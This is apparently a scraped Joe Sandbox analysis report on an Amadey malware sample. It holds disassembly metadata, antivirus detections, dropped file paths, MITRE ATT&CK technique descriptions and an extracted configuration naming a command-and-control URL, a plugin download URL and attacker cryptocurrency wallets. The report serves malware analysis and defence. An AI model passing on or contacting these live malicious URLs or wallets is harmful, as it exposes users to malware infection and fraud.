Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: c37c2dd406107f0e91389690441fc22a5fc7eab9d10338c8868b1a00c854d3e5
Instruction ID: bd3c10ba9b42fc37880e3141fa483aa5d37272a35874645f705477d44f254d64
Opcode Fuzzy Hash: c37c2dd406107f0e91389690441fc22a5fc7eab9d10338c8868b1a00c854d3e5
Instruction Fuzzy Hash: FCE01231555268A7CB012FA1EC49FE97F58FB09B62B000151F6559A270D7716940DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 008DC8BB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008DC8C4

Part of subcall function 008DD653: HeapFree.KERNEL32(00000000,00000000,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?), ref: 008DD669
Part of subcall function 008DD653: GetLastError.KERNEL32(?,?,008E142F,?,00000000,?,?,?,008E1456,?,00000007,?,?,008E1858,?,?), ref: 008DD67B

_free.LIBCMT ref: 008DC8D7
_free.LIBCMT ref: 008DC8E8
_free.LIBCMT ref: 008DC8F9

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 308955dd95a58e289b34d6351fcae23cfe9df75a2c2810c87c5a03018cb2471c
Instruction ID: 56cdaffb842205be2a3d8ccf158cb8e58d480c9560bb21f5c76d09bbcf3b3e06
Opcode Fuzzy Hash: 308955dd95a58e289b34d6351fcae23cfe9df75a2c2810c87c5a03018cb2471c
Instruction Fuzzy Hash: 73E09AB1400621DAC7096F38BC01DA93B61F794F203124517F56C62231EE3A45D5EAC6

Uniqueness

Uniqueness Score: -1.00%

Function 008CB5E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 481COMMON

Download Yara Rule

Strings

-, xrefs: 008CBBF6

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 47f108074ca1df253acd1e77bacbd3d9240dd372c79b321feababa61d22fe50f
Instruction ID: 9796a50ea4817124f44d26bc9ad25378c892d94e4ee10d82328622e39edda37f
Opcode Fuzzy Hash: 47f108074ca1df253acd1e77bacbd3d9240dd372c79b321feababa61d22fe50f
Instruction Fuzzy Hash: A6229FB0D012689BEF24EB28CD4ABDDBB75BB11304F5441D9D409A7382EB755B888F93

Uniqueness

Uniqueness Score: -1.00%

Function 008CEEA0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 317COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 008CF054
std::_Xinvalid_argument.LIBCPMT ref: 008CF51E

Strings

stoi argument out of range, xrefs: 008CEE7E, 008CF50F
invalid stoi argument, xrefs: 008CEE74, 008CF519

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: PathTempXinvalid_argumentstd::_
String ID: invalid stoi argument$stoi argument out of range
API String ID: 3948722134-1606216832
Opcode ID: c4cb2efddfe6c17762edeed6c39fac642f443019100bee93c45986e52704f232
Instruction ID: 67a478a89d490f8631cd1fa7781135a7e91455262ba30a4e905dedc9f42261b0
Opcode Fuzzy Hash: c4cb2efddfe6c17762edeed6c39fac642f443019100bee93c45986e52704f232
Instruction Fuzzy Hash: 03C1C1716002589BEB18EF38CC85B9D7B76FB45314F50829DE905D7382DB35CA848B96

Uniqueness

Uniqueness Score: -1.00%

Function 008DBF2A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 008DBF6D, 008DBF74, 008DBFAA

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
API String ID: 0-4106172500
Opcode ID: 01e386a365420ac174bc68c919f584be2fd368f1d5ef05cb84266b7c7fead540
Instruction ID: b9454357aa8be4ca98ac3817e9f2d183b9c0725e928ac5cb5da770f5aa84f6bd
Opcode Fuzzy Hash: 01e386a365420ac174bc68c919f584be2fd368f1d5ef05cb84266b7c7fead540
Instruction Fuzzy Hash: 42416D71A00619EBCB21DFAD9C81EAEBBA8FB85710F11026BE504E7351DB719E40DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008D8F7D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008D8FA2

Strings

MOC, xrefs: 008D8FB4
RCC, xrefs: 008D8FBC

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 0ff5437893d2f998c8d056c4fd2bc5eefdd3c4b68bab0c939495a84f5c290db9
Instruction ID: 737d12db210e3873efcb2b42cded483be4f28b6563d23afb83289a38e3ced7f5
Opcode Fuzzy Hash: 0ff5437893d2f998c8d056c4fd2bc5eefdd3c4b68bab0c939495a84f5c290db9
Instruction Fuzzy Hash: A9414671900209EFCF16DF98DC81AEEBBB6FF48314F1882AAF944A6211D7359D50DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008D207A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008D2093

Strings

5120, xrefs: 008D20DA
H, xrefs: 008D2146

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: 5120$H
API String ID: 514040917-2391956277
Opcode ID: 8dabf6c5efcf05bf6a5e57689a82c9bc7a492aeec1de16e6824bb5f819342f85
Instruction ID: 77dfc34de3f5a7c52caf8b52901d296022890ae9d8db99840d9e047d686a4b36
Opcode Fuzzy Hash: 8dabf6c5efcf05bf6a5e57689a82c9bc7a492aeec1de16e6824bb5f819342f85
Instruction Fuzzy Hash: AA217CB0900368ABDB14FB28C9567DD7FB4BB06704F5402CEE54997282D7755B488BA3

Uniqueness

Uniqueness Score: -1.00%

Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	Avira URL Cloud: Label: malware
Source: 62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware
Source: http://62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	ReversingLabs: Detection: 80%

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Joe Sandbox ML: detected

Source: 0.3.file.exe.4b3b820.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
Source: 19.2.rundll32.exe.6e7c0000.0.unpack	Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Amadey

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nika.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aKuf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

Windows Analysis Report
file.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre